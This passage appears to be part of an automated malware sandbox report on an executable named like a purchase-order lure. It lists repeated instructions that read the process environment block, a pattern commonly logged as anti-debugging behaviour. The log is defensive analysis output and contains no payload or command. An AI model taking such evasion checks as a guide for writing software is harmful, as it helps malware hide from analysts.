          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_012E9100 mov eax, dword ptr fs:[00000030h] 4_2_012E9100
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_012EC962 mov eax, dword ptr fs:[00000030h] 4_2_012EC962
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_012EB171 mov eax, dword ptr fs:[00000030h] 4_2_012EB171
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_012EB171 mov eax, dword ptr fs:[00000030h] 4_2_012EB171
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_0130B944 mov eax, dword ptr fs:[00000030h] 4_2_0130B944
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_0130B944 mov eax, dword ptr fs:[00000030h] 4_2_0130B944
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_013651BE mov eax, dword ptr fs:[00000030h] 4_2_013651BE
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_013651BE mov eax, dword ptr fs:[00000030h] 4_2_013651BE
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_013651BE mov eax, dword ptr fs:[00000030h] 4_2_013651BE
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_013651BE mov eax, dword ptr fs:[00000030h] 4_2_013651BE
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_013099BF mov ecx, dword ptr fs:[00000030h] 4_2_013099BF
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_013099BF mov ecx, dword ptr fs:[00000030h] 4_2_013099BF
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_013099BF mov eax, dword ptr fs:[00000030h] 4_2_013099BF
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_013099BF mov ecx, dword ptr fs:[00000030h] 4_2_013099BF
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_013099